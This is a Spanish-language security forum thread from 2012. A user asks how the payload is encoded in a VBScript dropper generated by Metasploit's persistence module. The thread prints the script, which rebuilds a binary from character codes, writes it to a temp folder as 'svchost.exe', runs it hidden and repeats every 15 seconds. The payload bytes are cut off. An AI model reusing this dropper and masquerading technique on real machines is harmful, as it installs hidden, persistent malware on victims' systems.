Inicio
Buscar
Ingresar
Registrarse
Starfield: el juego que revolucionará el espacio y la tecnología
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
Conversion de Payload
Imprimir
Páginas: [
1
]
Ir Abajo
Autor
Tema: Conversion de Payload (Leído 1621 veces)
AK-48
{ L2 } Nativo Digital
Mensajes: 92
Conversion de Payload
«
en:
Febrero 21, 2012, 07:17:49 pm »
Hola, Al abrir el archivo .VBS que genera el metasploit al correr RUN PERSISTENCE veo esto :
Function JxGGSsuCMsXcYGB()
okHzOCR=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr
(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)&Chr(255)&Chr(255)&C
hr(0)&Chr(0)&Chr(184)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Ch
r(0)&Chr(0)&Chr(64)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(
0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&
Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Ch
r(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(0
)&Chr(0)&Chr(0)&Chr(0)&Chr(0)&Chr(232)&Chr(0)&Chr(0)&Chr(0
)&Chr(14)&Chr(31)....................................................
Dim eSEWmDWe
Set eSEWmDWe = CreateObject("Scripting.FileSystemObject")
Dim CYbwdbtIXmbO
Dim LSMOKTRcWSPPE
Dim aJfgvTtPf
Dim JXxyQQMNSaTwVk
Set LSMOKTRcWSPPE = eSEWmDWe.GetSpecialFolder(2)
JXxyQQMNSaTwVk = LSMOKTRcWSPPE & "\" & eSEWmDWe.GetTempName()
eSEWmDWe.CreateFolder(JXxyQQMNSaTwVk)
aJfgvTtPf = JXxyQQMNSaTwVk & "\" & "svchost.exe"
Set CYbwdbtIXmbO = eSEWmDWe.CreateTextFile(aJfgvTtPf, true , false)
CYbwdbtIXmbO.Write okHzOCR
CYbwdbtIXmbO.Close
Dim nRYmMWSn
Set nRYmMWSn = CreateObject("Wscript.Shell")
nRYmMWSn.run aJfgvTtPf, 0, true
eSEWmDWe.DeleteFile(aJfgvTtPf)
eSEWmDWe.DeleteFolder(JXxyQQMNSaTwVk)
End Function
Do
JxGGSsuCMsXcYGB
WScript.Sleep 15000
Loop
Bueno, donde puse puntos suspensivos es por ke ese "choclo" de numeros sigue bastante...ese "choclo" es el PAYLOAD, pero quisiera saber a que esta convertido, osea si esta pasado a hexadecimal( se ke hexadecimal no es je) o a ke . Gracias
SAludos.
«
Última modificación: Febrero 21, 2012, 07:19:51 pm por ak48
»
En línea
overload
{ L7 } Juanker
Mensajes: 1147
Re:Conversion de Payload
«
Respuesta #1 en:
Febrero 22, 2012, 06:15:50 pm »
http://www.roubaixinteractive.com/PlayGround/Binary_Conversion/The_Characters.asp
Un saludo!
En línea
https://twitter.com/#!/overload_hxc
http://www.overload-blog.blogspot.com
AK-48
{ L2 } Nativo Digital
Mensajes: 92
Re:Conversion de Payload
«
Respuesta #2 en:
Febrero 22, 2012, 10:23:18 pm »
Gracias amigo
Saludo.
En línea
Imprimir
Páginas: [
1
]
Ir Arriba
Hack x Crack - Comunidad de Seguridad informática
»
Seguridad Informatica
»
Hacking
»
Conversion de Payload
Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso...
OK
Learn more